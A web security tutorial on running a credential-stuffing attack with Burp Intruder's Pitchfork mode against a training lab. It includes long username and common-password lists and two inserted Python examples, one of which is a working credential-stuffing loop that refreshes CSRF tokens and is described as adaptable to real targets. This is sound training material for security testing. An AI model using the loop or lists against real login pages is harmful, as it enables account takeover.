
Credential stuffing using a Burp Intruder Pitchfork attack

  • Last updated: August 25, 2022

  • Read time: 4 Minutes

Burp Intruder provides a number of different attack types, which determine the way in which payloads are injected into the defined payload positions.

The Pitchfork attack type is useful in cases where an attack requires you to send specific combinations of payloads from different lists in the same request.

In this tutorial, you'll learn:

  • How a pitchfork attack works
  • How to configure a basic pitchfork attack with two sets of payloads
  • How to perform a credential stuffing attack

What is credential stuffing?

Credential stuffing is a form of brute-force attack in which an attacker attempts to log in to a site using a dictionary of known username:password pairs from one or more other sites. These sets of credentials are typically obtained via earlier data breaches.

Pitchfork attacks are ideal for this purpose because you can ensure that each username is sent with its matching password. As you can see from the example below, the first item from each payload list is sent together, then the second item from each list, and so on.

How the pitchfork attack type uses payloads

You'll perform an attack just like this in the following tutorial.
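
As an added illustration (not part of the original tutorial or Burp's own code), the following Python reproduces the documented pairing behaviour: Pitchfork sends item i from every payload set in the same request and stops once the shortest set is exhausted, whereas Cluster bomb tries every combination. The lists are constructed and shortened from the ones used later in this tutorial.

```python
"""Added example for this tutorial (illustrative code, not Burp's own
implementation): how the Pitchfork attack type pairs payload sets, next to
Cluster bomb for comparison. The lists are constructed and shortened from
the ones the tutorial pastes into Intruder.
"""
from itertools import product


def pitchfork(*payload_sets):
    """Yield one tuple per request: item i from every payload set.
    zip() stops at the shortest set, which is exactly what Pitchfork does."""
    return zip(*payload_sets)


def cluster_bomb(*payload_sets):
    """Every combination of one item from each set (len(a) * len(b) requests)."""
    return product(*payload_sets)


def request_count(attack, *payload_sets):
    """Number of requests an attack type would send for these payload sets."""
    return sum(1 for _ in attack(*payload_sets))


def unsent_payloads(*payload_sets):
    """Tail entries Pitchfork would never send because a shorter set ran out.
    A non-empty result means the lists are misaligned: check before starting."""
    shortest = min(len(s) for s in payload_sets)
    return [list(s[shortest:]) for s in payload_sets]


def credential_pairs(usernames, passwords):
    """Pitchfork over two sets gives username:password pairs in list order."""
    return [f"{user}:{password}" for user, password in pitchfork(usernames, passwords)]


# Constructed sample lists; wiener and peter sit at the same index (8).
USERNAMES = ["carlos", "root", "admin", "test", "guest",
             "info", "adm", "mysql", "wiener", "user"]
PASSWORDS = ["123456", "password", "12345678", "qwerty", "123456789",
             "12345", "1234", "111111", "peter", "1234567"]

if __name__ == "__main__":
    pairs = credential_pairs(USERNAMES, PASSWORDS)
    print(f"pitchfork: {request_count(pitchfork, USERNAMES, PASSWORDS)} requests, e.g. {pairs[8]}")
    print(f"cluster bomb: {request_count(cluster_bomb, USERNAMES, PASSWORDS)} requests")
    # Drop the last password and the last username is silently never tried.
    print("unsent:", unsent_payloads(USERNAMES, PASSWORDS[:-1]))
```

Checking that both lists are the same length before starting (unsent_payloads returns only empty tails) avoids the silent misalignment where a shorter password list cuts off the last usernames, and the request counts show why Pitchfork rather than Cluster bomb is the right choice for known username:password pairs.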

Note

Burp's browser is an easy way to proxy HTTP traffic - even over the encrypted HTTPS protocol. There is no setup required - simply go to the Proxy tab, click Open Browser, and ensure Intercept is off.

Step 1: Open the lab

Using Burp's browser, access the following lab:

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

Note

While this lab is not intended to demonstrate this attack, it does feature a simple login form that we can use as an example.

Step 2: Send a login request to Burp Intruder

In the lab, click the My account link to open the login page. Submit the login form using any arbitrary values.

Making a login request using arbitrary values

In Burp Suite, go to the Proxy > HTTP history tab. Find the POST /login request and send it to Burp Intruder.

Step 3: Select the attack type

Click on the Intruder tab and go to the sub-tab containing your request.

At the top of the Positions sub-tab, use the Attack type drop-down menu to select Pitchfork.

Changing the attack type to Pitchfork

Step 4: Configure the payload positions

The Intruder > Positions sub-tab shows the request, with § markers automatically inserted around everything Burp has identified as a potential insertion point. This may include things like cookies that you do not want to replace with a payload. Use the Clear § button to clear all of these.

In our example, we are only replacing the username and password.

Highlight the value of the username parameter and click Add §. Do the same for the password parameter.

Adding payload markers to a request

Step 5: Add the username payloads

Go to the Payloads sub-tab.

At the top of the tab is the Payload Sets option. This lets you alternate between different sets of payloads and configure them.

For a Pitchfork attack, you need to configure the same number of payload sets as positions. Each set should also contain the same number of entries, because the attack stops as soon as the shortest set is exhausted, and a pair only matches if its username and password sit at the same index in their respective lists.

Select Payload set 1, then paste the list of candidate usernames into the Payload Options field.

Username list

carlos
root
admin
test
guest
info
adm
mysql
wiener
user
administrator
oracle
ftp
pi
puppet
ansible
ec2-user
vagrant
azureuser
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
administrator
administrators
admins
ads
adserver
adsl
ae
af
affiliate
affiliates
afiliados
ag
agenda
agent
ai
aix
ajax
ak
akamai
al
alabama
alaska
albuquerque
alerts
alpha
alterwind
am
amarillo
americas
an
anaheim
analyzer
announce
announcements
antivirus
ao
ap
apache
apollo
app
app01
app1
apple
application
applications
apps
appserver
aq
ar
archie
arcsight
argentina
arizona
arkansas
arlington
as
as400
asia
asterix
at
athena
atlanta
atlas
att
au
auction
austin
auth
auto
autodiscover

Pasting a payload set into Burp Intruder

Step 6: Add the password payloads

Select Payload set 2, then paste the list of candidate passwords into the Payload Options field.

Password list

123456
password
12345678
qwerty
123456789
12345
1234
111111
peter
1234567
dragon
123123
baseball
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
1234567890
michael
654321
superman
1qaz2wsx
7777777
121212
0
qazwsx
123qwe
killer
trustno1
jordan
jennifer
zxcvbnm
asdfgh
hunter
buster
soccer
harley
batman
andrew
tigger
sunshine
iloveyou
2000
charlie
robert
thomas
hockey
ranger
daniel
starwars
klaster
112233
george
computer
michelle
jessica
pepper
1111
zxcvbn
555555
11111111
131313
freedom
777777
pass
maggie
159753
aaaaaa
ginger
princess
joshua
cheese
amanda
summer
love
ashley
nicole
chelsea
biteme
matthew
access
yankees
987654321
dallas
austin
thunder
taylor
matrix
mobilemail
mom
monitor
monitoring
montana
moon
moscow
daniel

Step 7: Start the attack

Click Start Attack. A new Intruder attack window opens. Here, you can see the requests made by Intruder in real-time.

Step 8: Analyze the results

You can sort the results of the attack by any column, and apply filters by clicking the Filter bar. This can help you to spot differences between responses and patterns of results.

In our example, you can see that the combination of wiener and peter is the only one to return a 302 status code.

Analyzing the attack results

If you examine the response to this login, you can see that the server sent a new session cookie. This could indicate that the login was successful.

Note

Subsequent login attempts receive a 400 error response because the original CSRF token included in each request doesn't correspond to the new session ID.

In addition to sorting the results, you can also configure Grep settings on the Options tab to flag results that match a pattern of text or extract text that matches a pattern.
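
The note above describes why the replayed Intruder request gets a 400 after the first success. The following Python, added here as an illustration and not code from the tutorial, Burp or the lab, runs the same credential-stuffing loop in two ways: reusing one captured session and CSRF token as a plain Intruder attack does, and fetching a fresh session and token before each attempt. The HTTP transport is injected so it runs offline against the constructed FakeLab class; the /login path, the csrf form field and the session cookie name are assumptions modelled on the lab's form, and the response triage (flagging rows whose status differs from the majority) is the same comparison you make by sorting the Intruder results.

```python
"""Added example for this tutorial (illustrative, not Burp's or the lab's
code). The transport callable takes (method, path, cookies, form) and
returns (status, headers, body); FakeLab below is a constructed stand-in
for the lab so the logic can run offline.
"""
import re
from collections import Counter

# Assumption: the login page carries a hidden field named "csrf".
CSRF_RE = re.compile(r'name="csrf"\s+value="([^"]+)"')


def cookie_value(headers, name):
    """Value of a Set-Cookie `name=...` header from (header, value) pairs, or None."""
    for key, value in headers:
        if key.lower() == "set-cookie" and value.startswith(name + "="):
            return value.split(";", 1)[0].split("=", 1)[1]
    return None


def attempt_login(transport, username, password):
    """GET /login for a new session and token, then POST the candidate pair.
    Returns (status, new_session_cookie_or_None)."""
    _, headers, body = transport("GET", "/login", {}, None)
    session = cookie_value(headers, "session")
    match = CSRF_RE.search(body)
    if match is None:
        raise ValueError("login page did not contain a csrf field")
    form = {"csrf": match.group(1), "username": username, "password": password}
    status, headers, _ = transport("POST", "/login", {"session": session}, form)
    return status, cookie_value(headers, "session")


def stuff(transport, pairs):
    """Fresh token per attempt. Rows: (user, password, status, got_new_cookie)."""
    rows = []
    for user, pw in pairs:
        status, cookie = attempt_login(transport, user, pw)
        rows.append((user, pw, status, cookie is not None))
    return rows


def anomalies(rows):
    """Intruder-style triage: rows whose status code differs from the majority."""
    if not rows:
        return []
    baseline = Counter(row[2] for row in rows).most_common(1)[0][0]
    return [row for row in rows if row[2] != baseline]


def replay_like_intruder(transport, pairs):
    """Reuse one captured session and token for every request, as a plain
    Intruder attack does; attempts after the first success come back 400."""
    _, headers, body = transport("GET", "/login", {}, None)
    cookies = {"session": cookie_value(headers, "session")}
    token = CSRF_RE.search(body).group(1)
    statuses = []
    for user, pw in pairs:
        form = {"csrf": token, "username": user, "password": pw}
        status, _, _ = transport("POST", "/login", cookies, form)
        statuses.append(status)
    return statuses


class FakeLab:
    """Constructed stand-in for the lab's login endpoint (not the real lab).
    GET /login issues a session cookie and a CSRF token bound to it; a POST
    whose token does not match its session gets 400; valid credentials get
    302 with a fresh session (the old one is retired); anything else gets 200.
    """

    def __init__(self, valid_pairs):
        self.valid = set(valid_pairs)
        self.tokens = {}  # session id -> csrf token
        self.count = 0

    def _issue(self):
        self.count += 1
        sid = f"sess{self.count}"
        self.tokens[sid] = f"tok{self.count}"
        return sid

    def __call__(self, method, path, cookies, form):
        if method == "GET" and path == "/login":
            sid = self._issue()
            body = f'<input type="hidden" name="csrf" value="{self.tokens[sid]}">'
            return 200, [("Set-Cookie", f"session={sid}; Secure; HttpOnly")], body
        if method == "POST" and path == "/login":
            sid = cookies.get("session")
            if sid not in self.tokens or self.tokens[sid] != form.get("csrf"):
                return 400, [("Content-Type", "text/plain")], "Invalid CSRF token"
            if (form["username"], form["password"]) in self.valid:
                del self.tokens[sid]  # old session retired on successful login
                new_sid = self._issue()
                return 302, [("Location", "/my-account"),
                             ("Set-Cookie", f"session={new_sid}; Secure; HttpOnly")], ""
            return 200, [("Content-Type", "text/html")], "Invalid username or password."
        return 404, [], ""


# Constructed sample pairs, already lined up index-wise as Pitchfork sends them.
SAMPLE_PAIRS = [("carlos", "123456"), ("root", "password"), ("wiener", "peter"),
                ("user", "1234567"), ("admin", "admin")]

if __name__ == "__main__":
    print("replay:", replay_like_intruder(FakeLab({("wiener", "peter")}), SAMPLE_PAIRS))
    for row in anomalies(stuff(FakeLab({("wiener", "peter")}), SAMPLE_PAIRS)):
        print("candidate:", row)
```

Against a real target, the Burp equivalent of attempt_login is a session handling rule with a macro that requests /login and extracts the token before each Intruder request; in a script, replace FakeLab with a thin wrapper around your HTTP client that returns (status, headers, body).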

Step 9: Confirm your results

In the browser, go back to the login page and log in using the credentials wiener:peter to confirm that you have successfully identified a valid set of login credentials.

Summary

Congratulations, you have learned to configure pitchfork attacks and to use the Intruder Attack window to analyze the results.

What next?

In the wild, you may encounter additional defences, such as rate limiting, which make attacks like this more difficult. Why not check out the rest of our authentication-based materials on the Web Security Academy to learn more?
